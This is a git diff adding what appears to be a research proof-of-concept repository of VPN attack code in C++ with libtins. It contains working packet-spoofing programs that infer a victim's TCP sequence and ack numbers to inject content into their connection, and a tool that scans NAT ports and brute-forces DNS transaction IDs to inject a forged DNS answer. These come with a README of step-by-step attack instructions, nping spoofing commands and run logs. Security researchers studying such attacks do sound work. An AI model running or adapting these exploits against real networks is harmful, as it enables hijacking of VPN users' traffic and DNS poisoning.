use +// by spreading entire sequence range quicly then +// tries to find in win sequence using each +// +long find_in_win_seq() { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + long start_seq_guess = 1; + long max_seq_num = 4294967295; + track_nums = true; // phase 1 is so fast it sniffs false seq nums so we try each + + cout << "spreading the connections entire sequence number range...\n"; + usleep(1000000 / 2); + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::RST, 1); + + long i; + + for (i = start_seq_guess; i < max_seq_num; i += 50000) { // sends to the whole sequence num space + tcp.seq(i); + sender.send(pkt, iface); + num_sent ++; + usleep(10); + } + usleep(1000000); + cout << "finished round 1 spread, guessed in window seq: " << best_seq << "\n"; + + track_nums = false; + int j = 0; + long in_win_seq = -1; + + while (j < possible_seqs.size() && in_win_seq == -1) { // try each possible seq block + print_divider(1); + current_round = 0; + if (show) cout << "trying to find in window seq around " << possible_seqs[j] << "\n"; + in_win_seq = try_seq_block(possible_seqs[j]); + j ++; + if (show) cout << "in win seq after try? " << in_win_seq << "\n"; + usleep(1000000 / 2); + } + + + possible_seqs.clear(); + track_nums = false; + + print_divider(1); + usleep(1000000 / 2); + + return best_seq; + +} + + +// Send two spoof rounds while increasing the send delay and +// decreasing block size to quickly get in-win ack estimate +// +long find_in_win_ack(long in_win_seq) { + + // quack should be below current ack in use but we only rechack once first round + ack_search = true; + long quack = quack_spread(in_win_seq); + + // Spoof empty PSH-ACKs starting at 'quack' plus some send delay + // until we sniff a chack and know we just went below the left + // edge of the ack window + usleep(1000000); + print_divider(1); + possible_acks.clear(); + + long block_size = 10000; + int send_delay = 500; + long max_ack = quack + (1 * 100000000); + long min_ack = quack; + long clack; + + bool is_found = false; + + while (!is_found) { // retry ack scan until we find block triggering chacks + + cout << "starting round 1 ack scan w min: " << min_ack << " and max: " << max_ack << "\n"; + clack = find_ack_block(max_ack, min_ack, in_win_seq, block_size, send_delay, false, 2); + + is_found = rechack(in_win_seq, clack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + int i = 0; + + while (!is_found && i < possible_acks.size()) { + long some_ack = possible_acks[i]; + if (show) cout << "finished ack scan 1 w possible in window ack: " << some_ack << "\n"; + print_divider(1); + + is_found = rechack(in_win_seq, some_ack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + i ++; + if (is_found) clack = some_ack; + + } + max_ack = clack; + } + + possible_acks.clear(); + usleep(1000); + + + // clack should be an in window ack so now we have both in window + // sequence and in window ack numbers. + // + ack_search = false; + track_nums = false; + + // clack has been consistently within 40k of next ack while testing but + // in practical use it needs to be less than the expected ack by at most + // 20k to be accepted as a valid ack, so here we add 20k to counter our delay + // but we could add a third ack scan to make it more accurate + // + long in_win_ack = clack + 30000; // adding extra 30k for wifi delay + return in_win_ack; +} + + +// After we've found exact seq and in-win ack, attacker waits +// for a specific request size to inject the response into +// +int wait_for_request(long exact_seq, long in_win_ack) { + sniff_request = 1; + int res = 0; + + while (sniff_request != 2) { + usleep(500000); + if (show) cout << "waiting for request of size..\n"; + } + + if(show) cout << "Sniffed request packet to respond to\n"; + + res = inject_junk(exact_seq, in_win_ack); + + return res; +} + +// Attempt to infer the exact sequence number +// and in-window ack in use by the connection +// +int phase_three_spread() { + + bool is_found = false; + long in_win_seq = 0; + + // Loop until we find in window seq + while (!is_found) { + in_win_seq = find_in_win_seq(); + print_divider(1); + + is_found = rechack(in_win_seq, 0, 2); + cout << "approx seq: " << in_win_seq << " was in win after rechack? " << is_found << "\n"; + if (!is_found) usleep(1000000 / 2); + } + + // At this point we should have an in-window sequence number and + // next step is to find an in-window ack number for the connection + // + usleep(1000000 / 2); + + long in_win_ack = find_in_win_ack(in_win_seq); + in_win_ack += 40000; // add 40k for wifi delay + + cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n"; + + // jump back 40 for wifi delay + long exact_seq = find_exact_seq(in_win_seq - 40, in_win_ack, 100000) + 1; // should be one less than left edge + cout << "final exact seq guess: " << exact_seq << "\n"; + cout << "total number of packets sent: " << num_sent << "\n"; + print_divider(2); + + int res = 0; + + if (testing) { // for netcat + res = inject_junk(exact_seq, in_win_ack); + } else { // for normal http injection + cout << "waiting for client to request any page within inferred connection..."; + res = wait_for_request(exact_seq, in_win_ack); + } + + return res; + +} + + +int main(int argc, char** argv) { + + if (argc != 8) { + cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size)\n"; + return 0; + } + + remote_addr = argv[1]; + sport = atoi(argv[2]); + victim_wlan_addr = argv[3]; + dest_ip = argv[4]; + dest_mac = argv[5]; + dport = atoi(argv[6]); + request_size = atoi(argv[7]); + + thread sniff_thread(sniff_stuff); + print_divider(2); + + int r = phase_three_spread(); + + sniff_thread.detach(); + //sniff_thread.join(); + + return 0; +} diff --git a/demos/fb-mitm-firefox.mp4 b/demos/fb-mitm-firefox.mp4 new file mode 100644 index 0000000..53cab4a Binary files /dev/null and b/demos/fb-mitm-firefox.mp4 differ diff --git a/demos/nsl-brack.mp4 b/demos/nsl-brack.mp4 new file mode 100644 index 0000000..b4bebd1 Binary files /dev/null and b/demos/nsl-brack.mp4 differ diff --git a/demos/wa-jack.mov b/demos/wa-jack.mov new file mode 100644 index 0000000..49fc73f Binary files /dev/null and b/demos/wa-jack.mov differ diff --git a/old-readme b/old-readme new file mode 100644 index 0000000..a90b0ac --- /dev/null +++ b/old-readme @@ -0,0 +1,83 @@ +# VeepExploit + +The current version of VPN attack code + + + +##### Attack Machine Environment + +* C++ +* libtins (http://libtins.github.io/download/) + + +## Server-side attack + + +#### Requirements + +* VPN client connected to a VPN server +* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two + +***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder + + +#### Running the DNS Attack Script + +1. Change to udp-dns attack folder - `cd other-end-attack/dnuss/full_scan` +2. Compile attack script - `make` +3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp` +3. Try to inject from attack router - `sudo ./uud_send ` + + + +## Client-side attack + + +#### Requirements + +* VPN client connected to a VPN server +* Reverse path filtering disabled on the VPN client machine +* Attack router acting as the local network gateway for the victim (VPN client) machine + + +#### Running the Full Attack Script + +* Rebuild all the attack scripts: `./rebuild_all.sh` +* `cd full_attack` +* Change `attack.sh` vars to appropriate values +* `sh attack.sh ` + +***Note:*** `remote_ip` specifies the IP address of the HTTP site. + + +#### Testing Indivual attack phases + + +##### Phase 1 - Infer victim's private address + +* `cd first_phase` +* `python3 send.py ` + +***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`. + + +##### Phase 2 - Infer the port being used to talk to some remote address + +* `cd sec_phase` +* Edit `send.cpp` to use the correct MAC addresses +* `g++ send.cpp -o send -ltins` +* `./send ` + +***Note:*** `` is the address we wanna check if the client is connected to and the `` is almost always 80 or 443. The `` is the public address of the victim and `` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system. + + +##### Phase 3 - Infer exact sequence number and in-window ack + +* `cd third_phase` +* Edit `send.cpp` to use the correct MAC addresses +* `g++ send.cpp -o send -ltins` +* `./send ` + + +***Note:*** `` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified. + diff --git a/pcaps/client-side-caps/nping-examples/.setup.txt.swp b/pcaps/client-side-caps/nping-examples/.setup.txt.swp new file mode 100644 index 0000000..d619f28 Binary files /dev/null and b/pcaps/client-side-caps/nping-examples/.setup.txt.swp differ diff --git a/pcaps/client-side-caps/nping-examples/attacker/phase2_nping_attacker.pcap b/pcaps/client-side-caps/nping-examples/attacker/phase2_nping_attacker.pcap new file mode 100644 index 0000000..ba23948 Binary files /dev/null and b/pcaps/client-side-caps/nping-examples/attacker/phase2_nping_attacker.pcap differ diff --git a/pcaps/client-side-caps/nping-examples/attacker/phase3_nping_attacker.pcap b/pcaps/client-side-caps/nping-examples/attacker/phase3_nping_attacker.pcap new file mode 100644 index 0000000..31395ad Binary files /dev/null and b/pcaps/client-side-caps/nping-examples/attacker/phase3_nping_attacker.pcap differ diff --git a/pcaps/client-side-caps/nping-examples/setup.txt b/pcaps/client-side-caps/nping-examples/setup.txt new file mode 100644 index 0000000..5881ced --- /dev/null +++ b/pcaps/client-side-caps/nping-examples/setup.txt @@ -0,0 +1,28 @@ +Nping pcap commands during each phase: + +On attacker machine: `sudo tcpdump -i wlp1s0 -nnvvS not src port 22 and not dst port 22 -w wash_attacker.pcap` + +On victim macine: `sudo tcpdump -i any -nnvvS not src port 22 and not dst port 22 -w vic_any_capture_wash.pcap` + + + +Attacker commands + +Phase 2: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags SA -p 40402` + +Phase 3: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags R -p 40404 --seq 4253820601` + + + +Addresses in netcat example: + + +Phase 2 pcap: --> (netcat 172.217.12.14 80 -p 40402) + +Remote web address (google.com) -- 172.217.12.14:80 +Victim VPN address -- 10.7.7.8:40402 +Victim public address -- 192.168.12.137 +VPN server address -- 153.92.40.5:443 + +In the example, the attacker sends 5 npings with to the correct four-tuple, then sends 5 to the wrong four-tuple (port 40403). Then sends 5 more to the correct port to show differences in response. + diff --git a/pcaps/client-side-caps/nping-examples/victim/phase2_nping_vic.pcap b/pcaps/client-side-caps/nping-examples/victim/phase2_nping_vic.pcap new file mode 100644 index 0000000..38b3c5e Binary files /dev/null and b/pcaps/client-side-caps/nping-examples/victim/phase2_nping_vic.pcap differ diff --git a/pcaps/client-side-caps/nping-examples/victim/phase3_nping_vic.pcap b/pcaps/client-side-caps/nping-examples/victim/phase3_nping_vic.pcap new file mode 100644 index 0000000..1ba9908 Binary files /dev/null and b/pcaps/client-side-caps/nping-examples/victim/phase3_nping_vic.pcap differ diff --git a/pcaps/client-side-caps/washu-demo/setup.txt b/pcaps/client-side-caps/washu-demo/setup.txt new file mode 100644 index 0000000..2ecbf91 --- /dev/null +++ b/pcaps/client-side-caps/washu-demo/setup.txt @@ -0,0 +1,19 @@ +Full attack video pcap commands: + +On attacker machine: `sudo tcpdump -i wlp1s0 -nnvvS not src port 22 and not dst port 22 -w wash_attacker.pcap` + +On victim macine: `sudo tcpdump -i any -nnvvS not src port 22 and not dst port 22 -w vic_any_capture_wash.pcap` + + +Addresses in video: + + +Washington.edu -- 128.95.155.135:80 + +Local gateway address: 192.168.12.1 +Victim VPN address -- 10.7.7.8:38874 +Victim public address -- 192.168.12.137 + +Exact sequence num in use: +Real ack in use: + diff --git a/pcaps/client-side-caps/washu-demo/vic_any_capture_wash.pcap b/pcaps/client-side-caps/washu-demo/vic_any_capture_wash.pcap new file mode 100644 index 0000000..c9ef4f4 Binary files /dev/null and b/pcaps/client-side-caps/washu-demo/vic_any_capture_wash.pcap differ diff --git a/pcaps/client-side-caps/washu-demo/wash_attacker.pcap b/pcaps/client-side-caps/washu-demo/wash_attacker.pcap new file mode 100644 index 0000000..f3743c7 Binary files /dev/null and b/pcaps/client-side-caps/washu-demo/wash_attacker.pcap differ diff --git a/pcaps/server-side-caps/other-end-dns-inject.pcapng b/pcaps/server-side-caps/other-end-dns-inject.pcapng new file mode 100644 index 0000000..0e1e1b0 Binary files /dev/null and b/pcaps/server-side-caps/other-end-dns-inject.pcapng differ diff --git a/results/results.tar.gz b/results/results.tar.gz new file mode 100644 index 0000000..948d6bb Binary files /dev/null and b/results/results.tar.gz differ diff --git a/server-side-attack/dns-sside/full_scan/Makefile b/server-side-attack/dns-sside/full_scan/Makefile new file mode 100644 index 0000000..8737ce0 --- /dev/null +++ b/server-side-attack/dns-sside/full_scan/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o uud_send send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/dns-sside/full_scan/inject_test.sh b/server-side-attack/dns-sside/full_scan/inject_test.sh new file mode 100755 index 0000000..3e8ee9a --- /dev/null +++ b/server-side-attack/dns-sside/full_scan/inject_test.sh @@ -0,0 +1,12 @@ +#/bin/bash +# + +NOW=$(date '+%F %T') +printf "\n\nStarting inject attack at $NOW\n" + + +sudo ./uud_send 192.168.3.2 53 192.168.2.2 32000 62000 + + +NOW=$(date '+%F %T') +printf "\n\nFinished inject attack at $NOW\n" diff --git a/server-side-attack/dns-sside/full_scan/send.cpp b/server-side-attack/dns-sside/full_scan/send.cpp new file mode 100644 index 0000000..c4fe785 --- /dev/null +++ b/server-side-attack/dns-sside/full_scan/send.cpp @@ -0,0 +1,619 @@ +#include +#include +#include + +#include +#include +#include +#include + + + +using std::thread; +using std::cout; +using std::string; +using std::vector; +using namespace Tins; + + + +int current_spoof_port, best_port, chack_count, resp_count, sniff_size; +bool is_running = true; +bool verbose = false; +bool count_resp = false; + + +bool scanning = false; +bool injecting = false; +bool sniffed_resp = false; +string dest_ip; +string source_ip; + + + + +void print_start() { + cout << "meep\n"; + usleep(1000000 / 2); + cout << "meep\n"; + usleep(1000000 /2); + cout << R"( + + __ + / \ __ + .---. _ / / _.~ \ + \ `. / \ / /.-~ __/ + `\ \ | | |/ .-~ __ + \ \ | | | .'--~~ \ + \ \ | | ` ' _______/ + \ \ | ` / + .--. \ \ | ` / + \ `.\ \ \ / + `\ \ \ `\ ( + \ \ \ > ,-.-. + \ `. \ / | \ \ + \ . \ /___| O |O\ , + .-. \ ; | /` `^-.\.-'`--'/ + \ `; | | / + `\ \ | `. `--..____,' + \ `. | `._ _.-'^ + \ . / `|`|` + .-.\ / | | + \ `\ / | | + `\ ` | | | + \ | | | + .-. | | | + \ `. \ | | + `\ \ | | + \ \ | | + \_____ :-'~~~~~'-' ; + /____;``-. : + <____( `. ; + \___\ ; .' + /``--'~___.-' + /\___/^/__/ + / /' /`/' + \ \ `\ \ + `\ \ \ \ + \ \ \ \ + \ \ \ \ + \ \ \ \ ______ + \ \ ___\ \'~``______)> + \ \___ _______ __)> + _____\ \'~``______)> + <(_______.._______)> + + +)"; + usleep(1000000); + +} +void print_divider(int count) { + int i = 0; + while (i < count) { + if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + +void print_time() { + int res = system("date"); + +} + +// Used by thread to keep track of last port +// we spoofed to +// +bool handle_send_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + + if (ip.src_addr() == source_ip) current_spoof_port = some_pdu.rfind_pdu().dport(); + + return is_running; + +} + + +// Used by sniffing thread to look for packets +// NAT'ed back to the client that we may have +// spoofed +// +bool handle_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + + // should be looking for a packet from the VPN server and to the VPN client + // + // src ip will be the VPN server and dest ip will be the public address + // of the VPN client + + + if (ip.src_addr() == dest_ip && !injecting) { // dest_ip should be public VPN IP + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + + //cout << "sniffed packet going from VPN server with port: " << current_spoof_port << ", size: " << payload << " \n"; + + // 97 is the size of empty UDP packet NAT'ed back to the client so only look for packets that are bigger + // + if (payload >= 97 && payload != 147) { // could be a NAT'ed attacker packet + + if (verbose) cout << "sniffed response from VPN server with port: " << current_spoof_port << ", size: " << payload << " \n"; + + best_port = current_spoof_port; + sniff_size = payload - 97; + + + sniffed_resp = true; + if (count_resp) resp_count ++; + + } + + } + + + return is_running; +} + + +// Start sniffing things on one of the +// attack router interfaces +// +void sniff_stuff() { + SnifferConfiguration config; + config.set_promisc_mode(true); + Sniffer sniffer("enp0s8", config); + sniffer.sniff_loop(handle_packet); + +} + + +// Sniff outgoing interface for packets we send +// to get a better approx of the last packet sent +// +void sniff_send_stuff() { + + SnifferConfiguration config; + config.set_promisc_mode(true); + Sniffer sniffer("any", config); + sniffer.sniff_loop(handle_send_packet); + +} + + +// Generate random string of some length to send +// in attack probes +// +std::string random_string(std::size_t length) { + + const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; + + std::random_device random_device; + std::mt19937 generator(random_device()); + std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1); + + string random_string; + + for (std::size_t i = 0; i < length; ++i) { + random_string += CHARACTERS[distribution(generator)]; + } + + return random_string; +} + + +// Spread udp packets across a given port +// range while increasing the size each time +// +int port_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + PacketSender sender; + NetworkInterface iface("enp0s9"); + + IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport); + UDP& udp = pkt.rfind_pdu(); + + int current_port = best_port; + int spoof_port = start_port; + + int send_size = 0; + int send_count = 0; + string send_payload = random_string(send_size); + + cout << "spreading the port range from " << start_port << " to " << end_port << " with udps..\n"; + + while (spoof_port < end_port && !sniffed_resp) { + + IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload); + current_spoof_port = spoof_port; + //udp.dport(spoof_port); // set the packets dest port to current guess + + int round_sends = 0; + while (round_sends < 4) { // send 4 at a time then sleep again + IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload); + + udp.dport(spoof_port); + current_spoof_port = spoof_port; + sender.send(pkt, iface); + spoof_port++; + send_size ++; + round_sends ++; + send_payload = random_string(send_size); + + if (send_size >= 1000) { // reset probe size back to 0 on every 1000th port + send_size = 0; + if (verbose) cout << "Sent w size 1000 to " << spoof_port << "\n"; + } + + } + // if the payload size reaches 1000 (max), reset back to 0 + if (send_size >= 1000) { + send_size = 0; + if (verbose) cout << "Sent w size 1000 to " << spoof_port << "\n"; + } + + usleep(25); // scan send delay *** working w 30 before + } + + if (!sniffed_resp) usleep(1000000 / 3); // wait a third of a second just in case it was at the very top of the port range (i.e. ~61k) + + current_port = best_port; + if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n"; + if (verbose) cout << "size of round 1 response: " << sniff_size << "\n"; + + if (!sniffed_resp) current_port = 0; + + return current_port; +} + + + +// Send to the range of approximate ports +// again with different sizes to find the exact +// one in use +// +int find_exact_port(int block_port, int last_port, int last_size, string source_ip, int sport, string dest_ip) { + + // Using the size of the first round response we know we're within + // about 16 ports of the exact one in use but because of the delay it + // could be in one of a few different 1k blocks + + PacketSender sender; + NetworkInterface iface("enp0s9"); + + int block_start = block_port - 10000 + last_size; // start 10 thousand blocks back plus the sniff size + int spoof_port = block_start - 3; + int max_port = spoof_port + 16; // only check 16 ports in each thousand block + + int send_size = 0; + int current_port = 0; + string send_payload = random_string(0); + sniffed_resp = false; + + IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport); + UDP& udp = pkt.rfind_pdu(); + + while (!sniffed_resp && spoof_port < (block_port + 1000)) { + + send_payload = random_string(send_size); + IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload); + current_spoof_port = spoof_port; + udp.dport(spoof_port); // set the packets dest port to current guess + + if (verbose) cout << "sending to port: " << (spoof_port) << " w size: " << send_size << "\n"; + + sender.send(pkt, iface); + spoof_port++; + send_size += 5; + + if (spoof_port > max_port) { + spoof_port += (1000 - 17); // jump to the next thousand block + max_port = spoof_port + 16; + } + usleep(2000); + } + + while (!sniffed_resp) { + usleep(500000); + if (verbose) cout << "waiting for round 2 resp..\n"; + } + + current_port = best_port; + if (verbose) cout << "size of round 2 response: " << sniff_size << "\n"; + + + if (verbose) print_divider(2); + bool found = false; + + // Go over the exact same loop as round 2 without sending + // until we find the port that would have triggered the size + // that was sniffed + + spoof_port = block_start - 3; + max_port = spoof_port + 16; + send_size = 0; + + while (!found && spoof_port < (block_port + 1000)) { + + if (send_size > sniff_size) { + // we just passed the port that matched the connection + if (verbose) cout << "port on size match: " << spoof_port << "\n"; + current_port = spoof_port; + found = true; + } + + spoof_port++; + send_size += 5; + + if (spoof_port > max_port) { + spoof_port += (1000 - 17); + max_port = spoof_port + 16; + } + } + + + // Do one final scan within +-3 ports of approx to make sure + // we have the exact port in use + + int start_port = current_port - 3; + spoof_port = start_port; + max_port = spoof_port + 6; + send_size = 0; + sniffed_resp = false; + + while (!sniffed_resp && spoof_port < max_port) { + + send_payload = random_string(send_size); + IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload); + current_spoof_port = spoof_port; + udp.dport(spoof_port); // set the packets dest port to current guess + + if (verbose) cout << "sending final round spoof to port: " << (spoof_port) << " w size: " << send_size << "\n"; + + sender.send(pkt, iface); + spoof_port += 1; + send_size += 240; + } + + + while (!sniffed_resp) { + usleep(500000); + if (verbose) cout << "waiting for final exact scan resp..\n"; + } + + current_port = best_port; + if (verbose) cout << "size of final exact response: " << sniff_size << "\n"; + + int exact = start_port + (sniff_size / 240); + //cout << "FINAL EXACT PORT: " << exact << "\n\n"; + + return exact; +} + + + +// Spread udp packets across a port range to find the estimated +// port in use that forwards packet back to the client, then repeat the +// scan in the estimated range to find the exact one in use +// +int scan_for_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + PacketSender sender; + NetworkInterface iface("enp0s9"); + int i; + + // Find the estimated port + scanning = true; + int current_port = port_spread(source_ip, sport, dest_ip, start_port, end_port); + scanning = false; + + if (current_port == 0) return 0; + + int j = 0; + int exact_port = 0; + + if (verbose) print_divider(2); + sniffed_resp = false; + cout << "estimated port: " << current_port << " w sniff size: " << sniff_size << "\n"; + + int last_port = current_port; + int block_port = last_port; + + while (block_port % 1000 != 0) { + block_port --; + } + + if (verbose) cout << "highest port block: " << block_port << "\n"; + + // Find the exact port in use + int exact = find_exact_port(block_port, last_port, sniff_size, source_ip, sport, dest_ip); + if (verbose) cout << "some exact port? " << exact << "\n"; + exact_port = exact; + + return exact_port; + +} + + +// Not used now but could be added to recheck X times that a +// port is truly in use and forwarding packets back to the client +// +int recheck_port(int num_checks, int approx_port, string source_ip, int sport, string dest_ip) { + + + PacketSender sender; + NetworkInterface iface("enp0s9"); + + IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport); /// RawPDU("long message here actually a whole lot longer than the other one"); + UDP& udp = pkt.rfind_pdu(); + + bool is_found = false; + int curr_port = approx_port - 1; + + while (!is_found){ + + cout << "rechecking port: " << curr_port << "\n"; + + udp.dport(curr_port); // set the packets dest port to current guess + + for (int i = 0; i < num_checks; i ++) { + sender.send(pkt, iface); + usleep(1000); + } + + if (resp_count == num_checks) { + is_found = true; + } else { + curr_port ++;; + usleep(300000); + } + } + + int final_port = best_port; + int other_final = curr_port - 1; + cout << "maybe better final approx? " << other_final << "\n"; + + return final_port; +} + + +// Attempt to inject the dns response to the given 4 tuple (src_ip, sport, dest_ip, dport) +// while cycling through all possible txIDs for the dns reply +// +int send_dns(string src_ip, int sport, string dest_ip, int dport) { + + PacketSender sender; + NetworkInterface iface("enp0s10"); + + IP pkt = IP(dest_ip, src_ip) / UDP(dport, sport) / DNS(); + + cout << "Attempting to inject dns response on port " << dport << "\n\n"; + + string spoof_domain = "yo.com"; + string redirect_ip = "22.22.22.22"; + injecting = true; + + // Add the fake response + pkt.rfind_pdu().add_query({ spoof_domain, DNS::A, DNS::IN }); + pkt.rfind_pdu().add_answer( + DNS::resource( + spoof_domain, + redirect_ip, // some bad guy IP we wanna redirect to + DNS::A, + 1, // class of the record?? + // 777 is just a random TTL + 777 + ) + ); + // We want the query to be resolverd recursively + pkt.rfind_pdu().type(DNS::QRType::RESPONSE); + pkt.rfind_pdu().recursion_desired(1); + pkt.rfind_pdu().recursion_available(1); + + + int round_sends = 0; + int id = 1; + int num_blocks = 6; + int block_size = int(65535 / num_blocks); // 65535 is max transaction id for dns + + + while (id < block_size) { // try every txId in the block + + int send_id = id; + + while (round_sends < num_blocks) { // send once to each block + pkt.rfind_pdu().id(send_id); // set the transaction id guess + sender.send(pkt, iface); + send_id += block_size; + round_sends ++; + } + + if (id % 1000 == 0) cout << "sending dns response w id: " << id << "\n"; + id ++; + round_sends = 0; + + usleep(100); // was working 100% w 250 + } + + + return 1; + +} + + + +int find_ports(string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + bool is_found = false; + int current_port = 0; + + int last_port = start_port; + + while (!is_found) { + + sniffed_resp = false; + print_time(); + + int exact_port = scan_for_port(source_ip, sport, dest_ip, last_port, end_port); + print_divider(2); + + if (exact_port == 0) is_found = true; + else { + cout << "found some exact port: " << exact_port << "\n\n"; + print_time(); + + send_dns(source_ip, sport, dest_ip, exact_port); + usleep(1000000); + injecting = false; + } + resp_count = 0; + print_divider(1); + + + int next_port = exact_port + 2; + + while (next_port % 1000 != 0) { + next_port ++; + } + + last_port = next_port; + + } + + return 1; + +} + + + +int main(int argc, char** argv) { + + if (argc != 6) { + cout << "sike wrong number of args ---> (source_ip, sport, dest_ip, start_port, end_port)\n"; + return 0; + } + + source_ip = argv[1]; // dns server IP + int sport = atoi(argv[2]); // most likely 53 + dest_ip = argv[3]; // vpn server IP + verbose = true; + + int start_port = atoi(argv[4]); // Linux ephemeral range is (32768, 60999) + int end_port = atoi(argv[5]); + + print_divider(2); + + thread sniff_thread(sniff_stuff); + thread send_sniff_thread(sniff_send_stuff); + + int res = find_ports(source_ip, sport, dest_ip, start_port, end_port); + + //sniff_thread.join(); + //send_sniff_thread.join(); + + sniff_thread.detach(); + send_sniff_thread.detach(); + + return 1; +} diff --git a/server-side-attack/dns-sside/phases/udder_fillup/Makefile b/server-side-attack/dns-sside/phases/udder_fillup/Makefile new file mode 100644 index 0000000..8737ce0 --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_fillup/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o uud_send send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt b/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt new file mode 100644 index 0000000..9027f57 --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt @@ -0,0 +1,23545 @@ +Using tun src ip: +Filling up vpn port range from 32010 to 32020.. +arc twas: 5sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port ) +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: +Filling up vpn port range from 32010 to 32020.. +arc twas: 5sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port ) +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the 